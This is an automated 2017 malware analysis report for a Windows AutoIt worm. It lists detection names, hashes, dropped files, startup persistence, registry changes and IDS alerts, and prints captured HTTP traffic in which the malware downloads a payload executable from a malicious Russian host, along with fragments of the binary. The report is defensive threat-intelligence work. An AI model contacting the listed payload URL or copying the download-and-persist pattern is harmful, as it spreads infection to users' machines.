Worm.Win32.AutoItGen_d2eb3905c3

Trojan.GenericKD.5118443 (BitDefender), Trojan:Win32/Dynamer!ac (Microsoft), Trojan-Downloader.Win32.ZippyLoader.bjy (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.StartPage1.28795 (DrWeb), Troj...
Blog rating:2 out of5 with1 ratings

Worm.Win32.AutoItGen_d2eb3905c3

by malwarelabrobot on August 18th, 2017 in Malware Descriptions.

Trojan.GenericKD.5118443 (BitDefender), Trojan:Win32/Dynamer!ac (Microsoft), Trojan-Downloader.Win32.ZippyLoader.bjy (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.StartPage1.28795 (DrWeb), Trojan.GenericKD.5118443 (B) (Emsisoft), Artemis!A5032123C179 (McAfee), ML.Attribute.HighConfidence (Symantec), Trojan.BAT.CoinMiner (Ikarus), Trojan.GenericKD.5118443 (FSecure), Dropper.Generic_c.AZAW (AVG), Win32:Malware-gen (Avast), TROJ_GE.6451B86B (TrendMicro), Trojan.MSIL.Bladabindi.2.FD, Worm.Win32.AutoIt.FD, mzpefinder_pcap_file.YR, WormAutoItGen.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Worm, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: d2eb3905c3acbfd01f8a01a07390924c
SHA1: cc0e5051da0f5f8049e2b2ee8dfb1d9f35681a3f
SHA256: b065d04699335387cb131465fdf6f02d2da4758ddfae67a7e3971a8459036e6a
SSDeep: 24576:GJlh9bD1FSJXPmpRENqdAnxK1RQt5r9wm/KtePIBQ44s0ln:GJhSJXPyRMxKeh mIws0R
Size: 1403065 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company:
Created at: 2016-08-14 22:15:49
Analyzed on: Windows7 SP1 32-bit


Summary:

Worm. A program that is primarily replicating on networks or removable drives.

Payload

No specific payload has been found.

Process activity

The Worm creates the following process(es):

WScript.exe:3584
WScript.exe:2952
32.exe:3980
sww.exe:3436
%original file name%.exe:2748

The Worm injects its code into the following process(es):

sworiginal.exe:3336
Security.exe:1128

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process WScript.exe:2952 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\32.bat (12 bytes)

The process 32.exe:3980 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WindowsData1\Security.exe (767 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WindowsData1\1.VBS (133 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WindowsData1\1.bat (29 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Security.exe.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WindowsData1\system.exe (5249 bytes)

The Worm deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WindowsData1\__tmp_rar_sfx_access_check_358490 (0 bytes)

The process sww.exe:3436 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut1F76.tmp (120 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\32.bat (392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Service.vbs (298 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\5.bat (87 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut1F74.tmp (120 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut1F64.tmp (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut1F62.tmp (64 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\32.vbs (124 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\1.vbs (64 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut1F77.tmp (218 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut1F75.tmp (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Service.vbs.lnk (683 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut1F63.tmp (83 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\64.bat (392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\64.vbs (124 bytes)

The Worm deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut1F76.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut1F63.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut1F64.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut1F75.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut1F77.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut1F62.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut1F74.tmp (0 bytes)

The process %original file name%.exe:2748 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RarSFX0\sworiginal.exe (130 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RarSFX0\sww.exe (20825 bytes)

The Worm deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_334356 (0 bytes)

Registry activity

The process WScript.exe:3584 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Worm deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process WScript.exe:2952 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Worm deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process 32.exe:3980 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Worm deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process %original file name%.exe:2748 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Worm deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

Dropped PE files

MD5 File path
fc370a07e3144781acbd2d91576ad3cb c:\Users\"%CurrentUserName%"\AppData\Local\Temp\RarSFX0\sworiginal.exe
a5032123c17928d848a9c72721246208 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\RarSFX0\sww.exe
ef83d47b5d14a17618bcb4330541befb c:\Users\"%CurrentUserName%"\AppData\Local\Temp\WindowsData1\Security.exe
4de26295f20875fc3ad6b94c4a6e118e c:\Users\"%CurrentUserName%"\AppData\Local\Temp\WindowsData1\system.exe
36180f6a5233ee4752880c431d6ee058 c:\Users\"%CurrentUserName%"\AppData\Roaming\WindowsTask\32.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 188392 188416 4.65119 2ae181684b1677561119f5765623448e
.rdata 192512 39376 39424 3.57169 0e0f6a60d8fa917a060c8ef7becc0888
.data 233472 129208 3072 2.28424 4e4aa728d9cced1622c2be27733e3fc5
.gfids 364544 240 512 1.47202 c923099e27bf0e45a5c402d935d0620b
.rsrc 368640 22431 22528 4.57632 a77a90206b484188bbeef1216ef2141a
.reloc 393216 8076 8192 4.59547 d13d3f8a8adfe6861c49a01d81cf73ed

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://fireass.ru/Logs/he/021/32.exe 88.212.240.52


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN JS/Nemucod requesting EXE payload 2016-02-01
ET TROJAN Possible Dridex Download URI Struct with no referer
ET POLICY PE EXE or DLL Windows file download HTTP
ET TROJAN JS/Nemucod.M.gen downloading EXE payload
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

HEAD /Logs/he/021/32.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
Host: fireass.ru


HTTP/1.1 200 OK
Last-Modified: Tue, 25 Jul 2017 11:20:10 GMT
Content-Type: application/x-msdownload
Content-Length: 893637
Date: Thu, 17 Aug 2017 08:16:50 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
HTTP/1.1 200 OK..Last-Modified: Tue, 25 Jul 2017 11:20:10 GMT..Content
-Type: application/x-msdownload..Content-Length: 893637..Date: Thu, 17
 Aug 2017 08:16:50 GMT..Accept-Ranges: bytes..Server: LiteSpeed..Conne
ction: Keep-Alive......


GET /Logs/he/021/32.exe HTTP/1.1


Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 25 Jul 2017 11:20:10 GMT
Range: bytes=0-4955
User-Agent: Microsoft BITS/7.5
Host: fireass.ru


HTTP/1.1 206 Partial Content
Last-Modified: Tue, 25 Jul 2017 11:20:10 GMT
Content-Type: application/x-msdownload
Content-Range: bytes 0-4955/893637
Content-Length: 4956
Date: Thu, 17 Aug 2017 08:16:56 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........gQ!..?r..?r
..?rj..r..?rj..rU.?rj..r..?r.[<s..?r.[;s..?r.[:s..?r.~.r..?r.~.r..?
r..>r&.?r.[:s..?r.[?s..?r.[.r..?r.[=s..?rRich..?r........PE..L...e.
.W..........................................@.........................
..............@.........................p}..4....}..(........G........
...................^..T...............................@...............
....4s.. ....................text............................... ..`.r
data..............................@..@.data................~..........
....@....gfids..............................@..@.rsrc....G.......H....
..............@..@.reloc........... ..................@..B............
......................................................................
......................................................................
......................................................................
..................................................U...M.VW.}...u..O .E
..G0.E..G4.G.PWh#.@.Q.\..........t.~.............O....PQj.W........_..
^].U...u..E..u..u..p..p..S........~.........].U..V.u..v..v..s....f...f
..YY^].U...E.3.V...B...t......J...B..u. ..M..B..a...a...1.A.^].U...E.V
W3....B.....t......J.f.....f;.u. ....M...U.....y..y._.1.A.^].U...E(..t
j.M..U.S.].W.} ...t*...u(..t....A..........M..H..M..H..X..x.... ..M.V.
p0..t..p4.u$WSQ.u...R.u..u........^_[].$.U...E..E.t-.U..J..B.#M.#E...t
..B..J.#E.#M.;B.u.;J.t.2.]...].U.......aC..U...V.u...(aC..........
<<< skipped >>>

GET /Logs/he/021/32.exe HTTP/1.1


Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 25 Jul 2017 11:20:10 GMT
Range: bytes=4956-10151
User-Agent: Microsoft BITS/7.5
Host: fireass.ru


HTTP/1.1 206 Partial Content
Last-Modified: Tue, 25 Jul 2017 11:20:10 GMT
Content-Type: application/x-msdownload
Content-Range: bytes 4956-10151/893637
Content-Length: 5196
Date: Thu, 17 Aug 2017 08:16:58 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
.v. A.P........A....V...F.Pj......j....C....l....;K..^...l3...t.3.8.a3
.....H..... ..."...V.t$.W.....l...u..~..s..F..t.................u.3.8.
.......H..... .F....u.h.....F P....... 3.f9.tCSj\Yj_[f9.u....l...u.f..
f.>:u.f......./t.f;.u....l...t.f.....f9.u.[_^...S..VW3....l....."..
...l...u....".......".........T".........._^[...a3..... .......W..$. .
..L$..W... .$. ..;G...c... ..G......U...S..$. ..UV.............7....O.
.w. ...).......!...|.;........,....l$$..... o...3....{...D$ .L$.......
...u}..uy...C........D$...t/...v.......t..L$....l.....D$....l.....K .C
$.D$...t ...C.......t..L$....l.....D$....l.....K0.C4.L$..D$ .{..t..{..
..G.......?...r......4................................................
...t;..........{..u..G. D$$...u...... ...U.......U.6..................
....D$....... ........ ............. .....!....E....t%...D..........;.
r...VU........D$.......t'..............;.r...V...!....U.a.......... ..
.t..........."..... ...t..........."..... ............................
$...... ...........$...........s.V..$......P.......4.....h. ....$....P
P.....h..........P..$....P..............}..........r...... ......$....
...\...Ph..B..D$4.......j.P.........D$,h....P.D$..."..P.&...."........
......................D$.$..L$..D$....t5....t......j.P..0.............
..RP..0.........L$..D$....t-....t..p...j.P..8....S..........RP..8.....
....D$.........|$....t..5...j.P..@.........b...._...RP..@....\....K...
...........<...j ..d.....`.......P.Q............t..L$..C P._.......
...............$................W...............v..L$..C P.....j..
<<< skipped >>>

GET /Logs/he/021/32.exe HTTP/1.1


Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 25 Jul 2017 11:20:10 GMT
Range: bytes=10152-15344
User-Agent: Microsoft BITS/7.5
Host: fireass.ru


HTTP/1.1 206 Partial Content
Last-Modified: Tue, 25 Jul 2017 11:20:10 GMT
Content-Type: application/x-msdownload
Content-Range: bytes 10152-15344/893637
Content-Length: 5193
Date: Thu, 17 Aug 2017 08:16:59 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
..2....M4.&...$..M4..\"............`".....w.j...d"..P.M4.Y.....\"...t_
j...t"..V.M4.?...j..EXP.M4.1....E.P.....j.V.E.P.F....E.P.E.P.L...j..E.
P.EXP................\".....l....Z........."..t....E..R...}(..m...E$..
.!..j.Y...u(.M4...!.....E_..H....EX.........L....-....M4.............P
............$...T.........t........P.....T.....L.....T.....H.....P...;
.|...;.w.......\....M4..X................F.t..M4.....j.P..0..........`
...........t..M4..`........q.....d...........M4.\......EX...$?....2.N.
.M4.F..?....M4.F..4......!..3....B.............F.".......:.u..........
.u.........N......"..............."."........}_..MX......t...@t.....3.
............".............................#...........................
.....;.r...W......P.M4.......=...........h.....~ WP......M0...E,t.VQ.E
4..P......}_.t.V.........h..B.W.....YY..u....l....}^.......W.C.Pj..4..
........."......k..j.Y...!.....M4.......3.@.."....l......."....l......
."......$....l.....l..3.3....l..@...l.....t..M4.r......m..3.3.@.....m.
....l...t.9..m..t....M0...l.....E,t...."..PQ.E4..P........l..;..l....|
....l..;..l..v..EH.E ..........M4..o...M..E _^[d.......e`].QV.....l...
t.3..g...P....l.....l..H...l.....t....u....P......L$..............t'..
.l..;..l....|....l..;..l..w............^Y....B................V.....l.
..t..F.Pj......j....C...2...P......E.....8.......E..3....l......I.....
.;..........V.....V..u.8.IV..u........S... ..W.......S...........3....
...S...V...].......}.9].uS9..V..|......V......v..F.Pj.............u...
.!.... ...V............V..... ...7.E...8.KV..tZ...!..8.$A....A....
<<< skipped >>>

GET /Logs/he/021/32.exe HTTP/1.1


Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 25 Jul 2017 11:20:10 GMT
Range: bytes=15345-26477
User-Agent: Microsoft BITS/7.5
Host: fireass.ru


HTTP/1.1 206 Partial Content
Last-Modified: Tue, 25 Jul 2017 11:20:10 GMT
Content-Type: application/x-msdownload
Content-Range: bytes 15345-26477/893637
Content-Length: 11133
Date: Thu, 17 Aug 2017 08:17:00 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
f.nT$4f...f...f.nL$..(.f.b.f.r..f.r..f...f.n..(..)D$`f....(.f....(.f.r
..f.r..f...f.nD$0f.b..(D$`f.b.f...f.n|$$f...f....)\$P.(.f.r..f.r..f...
.(.f.p..f....(.f...f.p.N.(.f.n.f.r..f.r..f...f.nD$ f.p.9f.nL$.f.b.f.b.
f.b.f..|$Pf...f....(.f.r..f.r..f....)D$`.(.f.n\$.f...f.n..(.f.n.f...f.
b..(.f.r..f.r..f...f.nD$,f.b..(D$`f.b.f...f.n.f...f....)\$P.(.f.r..f.r
..f....(.f.p.9f....(.f...f.p.N.(.f.n.f.r..f.r..f...f.nD$$f.b.f.p..f.nL
$.f.b.f.b.f..|$Pf.nL$.f...f...f.n..(.f.b.f.r..f.r..f...f.n\$,.(..)D$`f
....(.f....(.f.r..f.r..f...f.nD$ f.b..(D$`f.b.f...f...f....)\$P.(.f.r.
.f.r..f....(.f....(.f....(.f.r..f.r..f...f.n|$4f.nD$.f.b.f.p.9f.nL$.f.
p.Nf.nT$(f.b.f.b.f..|$Pf.p..f...f...f.nL$0.(.f.n.f.r..f.r..f.b.f...f.n
\$..(..)D$`f....(.f....(.f.r..f.r..f...f.n.f.b..(D$`f.b.f...f.n|$$f...
f....)\$P.(.f.r..f.r..f....(.f.p.9f....(.f...f.p.N.(.f.n.f.r..f.r..f..
.f.nD$,f.b.f.p..f.nL$.f.b.f.nT$(f.b.f..|$Pf...f.n.f....(.f.r..f.r..f..
.f.n\$0.(..)D$`f....(.f....(.f.r..f.r..f...f.nD$.f.b..(D$`f.b.f.b.f...
f.n|$ f...f....)\$P.(.f.r..f.r..f....(.f.p..f....(.f...f.p.Nf.nT$..(.f
.r..f.r..f...f.n.f.b.f.p.9f.nL$.f.b.f.b.f..|$Pf.nL$.f...f...f.n..(.f.b
.f.r..f.r..f...f.n..(..)D$`f....(.f....(.f.r..f.r..f...f.nD$4f.b..(D$`
f.b.f...f.n|$0f...f....)\$P.(.f.r..f.r..f....(.f.p.9f....(.f...f.p.Nf.
nT$ .(.f.r..f.r..f...f.nD$4f.p..f.nL$.f.b.f.b.f.b.f..|$Pf...f.n.f...f.
n..(.f.b.f.r..f.r..f...f.n\$..(..)D$`f....(.f....(.f.r..f.r..f...f.n.f
.b..(D$`f.b.f...f.n|$,f...f....)\$P.(.f.r..f.r..f....(.f.p..f....(.f..
.f.p.N.(.f.n.f.r..f.r..f...f.n.f.b.f.p.9f.nL$.f.b.f.b.f..|$Pf.nT$.
<<< skipped >>>

GET /Logs/he/021/32.exe HTTP/1.1


Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 25 Jul 2017 11:20:10 GMT
Range: bytes=26478-49695
User-Agent: Microsoft BITS/7.5
Host: fireass.ru


HTTP/1.1 206 Partial Content
Last-Modified: Tue, 25 Jul 2017 11:20:10 GMT
Content-Type: application/x-msdownload
Content-Range: bytes 26478-49695/893637
Content-Length: 23218
Date: Thu, 17 Aug 2017 08:17:01 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
...3...F.P.W;....to...f..tgP.E;....u]f9>u!..F.P.2;....u.3.f9F.u...3
..D$....3..D$.f9>u.f9~.u...F.P..;....u.3.f9F.u....|$..u...u.C3....f
9n...v.....3..t$.V.$:....t.2..R..f9.tDj....Xf9F.u.f9F.u(...P..:....u.f
9.u...t...F.P..:....t.Kj.X...Gf9n.u.3......_][^...V.t$.W.|$....Q...u*.
..Q...t!...E..h..B.P.G...YY..u..t$.V........E..h..B.P.&...YY..u.....Q.
.P.t$.V....._^...U......E.SPj 3.....B.P..4.C...tJ.E..E.....P.u..E.....
S..(.C...t!SSS.E.PS.u...0.C...t.....B...u....u.....B...[..]...U....L.E
..M..e...E..E..E..E..E..E..E..E............]......B...K..QSV..W.u.3..N
..>.~..aJ...].3..^.f......f......h.....}........_K..Y.E..E....t..N.
Q..................r.....r.j.X.M..G..._^[d........]...VW..........t...
.M...h....V.-K..YY.O._^.jJ...T$..A.;B.w.r...;.s.3.@..3.....D$....I.;H.
w.r.;.w.;.u.;H.t.3...3.@...SV.t$....l...u...."..2........"........."..
......".t..t$.......C.V.}...Vj".u...3...^...[....H....YK..SUV..3.W.L$.
.F.... ..f...r..f.F\.................*S.D$.PW.A$....t...$............$
...........N.UW.O.....u..N.........q...I8.'A..t...$@....b............t
.S.D$.PW..#....t...$............$...........N.UW......N...u.8.'A..t...
$@...wb..9.....u2.F.f...r..It%.=..C..t.8.. ..u.WjC.J...j....C......_^]
[..H..........#J..V...F....Q.....i......Q...S..$.......UW............"
..PW.M ............W......D$...tFW.....P.. ....u.3....2..QP...2...D$..
L$ ...2..Ph....WQ.v.......D$...ulj.W./....F....".....Q.........PW.....
..tch....W.D$ P.Vo..j.W..6..j.W......F....".....Q.........PW........D$
...t...tw.F....Q...u...."..W..!................tB.V....2.....b....
<<< skipped >>>

GET /Logs/he/021/32.exe HTTP/1.1


Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 25 Jul 2017 11:20:10 GMT
Range: bytes=49696-96190
User-Agent: Microsoft BITS/7.5
Host: fireass.ru


HTTP/1.1 206 Partial Content
Last-Modified: Tue, 25 Jul 2017 11:20:10 GMT
Content-Type: application/x-msdownload
Content-Range: bytes 49696-96190/893637
Content-Length: 46495
Date: Thu, 17 Aug 2017 08:17:02 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
..... ......3....3...3...3...3......c.....3... .C....A.C....@.C....C.C
....@.C....C.C....B.C....B.C....A.C...t......................3....C.C.
...B.C....A.C....@.C...t......................3.........B.C....3....A.
C....3....@.C....C.C........2.4.t2.....3....3..............3..........
........ .....2... .C...t................d.....3.......B.C....A.C....@
.C....C.C....B.D....A.D....@.D....C.C...t...................3....@.C..
..C.C....B.C....A.C....@.D....C.D....B.D....A.C...t...................
3....A.C....@.C....C.C....B.C....A.D....@.D....C.D....B.C...t.........
..........3....C.C....B.C....A.C....@.C.C...C.D....B.D....A.D....@.C..
.......o...^[..]...$S3.UV@.t$.W..3......^..N..V..D$....$..|$....D$@-..
..t ..@t...@u.j .G........\$8..j.3..G.....[....j..G.....[3.....t#.|$&l
t;...L$............./E...;.r..|$..L$D..u.j..G.VP..............D7.F...|
..D$...P.H....|$8.u........_^][..$....T$..L$.V.t$...3....F.3B..A..F.3B
..A..F.3B..A.^.....TUW.|$d...l$.............}...|$dt..t$hW.t$h........
...E.j.P.D$0.D$TP............Q....T$`SV.B..D$..D$p ..T$,.H..L$ .u.....
..........L$(..PQ.D$LP.8....T$D..L$K......@.C.3..@.C...D$N3..@.C..\$h.
\$P.L$h...3..@.C..L$h.L$4....T$H......@.C.3..@.C...D$O3..@.C...D$R3..@
.C...D$F.L$p.L$8......@.C..T$L3..@.C..D$..L$....3..@.C...D$S3..@.C...D
$G.L$..L$<..L$J...@.C.3..@.C..D$..L$....3..@.C....3..@.C.N.L$..L$@.
....Q....|$h.F......N.D$....t$..E.3..U..D$h.m..E.3.3T$..D$..........].
3\$p....<.@.C.........3<.@.C......3<.@.C..D$h...3<.@.C..D$
........|$4...@.C.3..@.C..D$p.D$h.L$p......3..@.C....3..@.C....L$p
<<< skipped >>>

GET /Logs/he/021/32.exe HTTP/1.1


Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 25 Jul 2017 11:20:10 GMT
Range: bytes=96191-189936
User-Agent: Microsoft BITS/7.5
Host: fireass.ru


HTTP/1.1 206 Partial Content
Last-Modified: Tue, 25 Jul 2017 11:20:10 GMT
Content-Type: application/x-msdownload
Content-Range: bytes 96191-189936/893637
Content-Length: 93746
Date: Thu, 17 Aug 2017 08:17:03 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
P..$.......P.D$,PQ.R...x.....U..h.C..D$xP...Q..D$.P...Q..D$.P...Q..D$.
P...Q...t...^.._][..d.....$SUVWj...X.C..5`.C...U.l$.....U.\$......D$.P
j..t$@.t$...p.C..D$$..D$<..|$ ...D$@;.}....D$@P.t$@U..l.C..t$8..S..
X.C...UV....h ....t$(..3..t$(PP.t$(.t$X.t$XPP.t$8..\.C.W.|$.W..V.t$...
.5T.C.W...t$....t$.j.....C._^..][..$...U..........`...V.u.jPPV....C...
t&W.x.C...`...WP..{....t.j.Wj.V....C..._..t.j.V....C.^..]....t$... .B.
.........U..QQVh..C....8d..j.......C..E..E.....P.E.......<.C.h..D..
...C...^..].U..d.....j.h..B.Pd.%.......D.P...Q.....C..M.d........].V..
..D.....!.......... .......... ....0..... .......... ....^.. ..S.\$.U.
l$.V.t$.W.|$.j.j.hD.C.SUWV...................tq...u.......tM...t=..dt.
3..j.8~E.j..0.I ..P.8~E..0h.....{F..PV.p.....t<.8~E..0.*j.V....C..(
.8~E..p..0jeV..t.C.j....3..8~E.jeV....C.3.@_^][....D$...U3.f9(t>SVj
\[...f;.u!..p.f;.u.f............nu.j.Zf....f........f9(u.^[3.f..]...U.
.. .....:..h..........P._....=N.D..unj..5L.C.......P.V*..P..y....uPh..
B............P.....3.j.Qf..E.....E.P.0J......E.....j.Xf.E........E..E.
P....C...]..D$.3...t.f9.u......U....(...G:...E...t&f.8.t&.M.QP......P.
...C.......Pj..."....H.D...].U....,....=`.C..SVW.....u1jd......Pj.S..P
.B.f......f.,^E.3.f..^E...`.C.,^E.j2.E.P.u..u...^...}.3..u.VWhP.C.f...
E.Pj.S..\.B.3.f.Dw._^[..]...SUV.t$.W...........f.........|$...j"Zj,2.[
f;.uH.F.f9.u!..u.;.u...V.j"f;.t.f..Zt...f.../Z....t.2...RP.Nk..Y..Y...
j,:.[u....f;.u...t.f...........f..t.j"Z..3.f........Q..]....u.....3.f.
....D$.3.f..3._^][....F.B...7..Q.H}....8..SVW3..e.S.......].......
<<< skipped >>>

GET /Logs/he/021/32.exe HTTP/1.1


Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 25 Jul 2017 11:20:10 GMT
Range: bytes=189937-375632
User-Agent: Microsoft BITS/7.5
Host: fireass.ru


HTTP/1.1 206 Partial Content
Last-Modified: Tue, 25 Jul 2017 11:20:10 GMT
Content-Type: application/x-msdownload
Content-Range: bytes 189937-375632/893637
Content-Length: 185696
Date: Thu, 17 Aug 2017 08:17:04 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
...(...B...\...n...~.........................B.....-.A._.@.i.@.s.@...@
...@...@...@...@...@...@...........A.%.A..*B..fB.d.B...B..........PB..
.B..gB.............*.....@.\.@. .@...@...@.M.a.x.i.m.u.m. .a.l.l.o.w.e
.d. .a.r.r.a.y. .s.i.z.e. .(.%.u.). .i.s. .e.x.c.e.e.d.e.d...C.M.T...R
.R.................;.%.u..............................................
......................................................................
...................................................g..j..g.r.n<:.O.
.R.Q.h.........[.........R.Q.h.........[g..j..g.r.n<:.O...\.....S.e
.S.e.c.u.r.i.t.y.P.r.i.v.i.l.e.g.e...S.e.R.e.s.t.o.r.e.P.r.i.v.i.l.e.g
.e.....S.e.C.r.e.a.t.e.S.y.m.b.o.l.i.c.L.i.n.k.P.r.i.v.i.l.e.g.e...\.?
.?.\.....U.N.C.\.....A.C.L...S.T.M...r.t.m.p.%.d.......@.\.@. .@...@..
.@............._._.r.a.r._.....*.?.....\.....r.a.r.....e.x.e...s.f.x..
.r.a.r...0.0.....?.*.<.>.|.".....?.*.....%.c.:.\.....\.\.?.\....
.U.N.C...*messages***....*.m.e.s.s.a.g.e.s.*.*.*.....r!......R.T.L...L
.T.R.......s...$...@...%.0.8.x.........C.r.y.p.t.3.2...d.l.l...CryptPr
otectMemory..CryptUnprotectMemory....C.r.y.p.t.P.r.o.t.e.c.t.M.e.m.o.r
.y. .f.a.i.l.e.d...C.r.y.p.t.U.n.p.r.o.t.e.c.t.M.e.m.o.r.y. .f.a.i.l.e
.d..../.B.D7q........[.V9...Y..?..^.......[....1$.}.Ut].r........t....
i...G.........$o,.-..tJ...\...vRQ>.m.1..'....Y.....G...Qc..g))....'
8!...m,M..8STs.e..jv.....,r.....Kf..p.K..Ql.....$....5..p.j......l7.Lw
H'...4...9J..NO..[.o.h...toc.x.x...........lP......xq.xlistpos....k.e.
r.n.e.l.3.2.....SetDllDirectoryW....SetDefaultDllDirectories....v.
<<< skipped >>>

GET /Logs/he/021/32.exe HTTP/1.1


Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
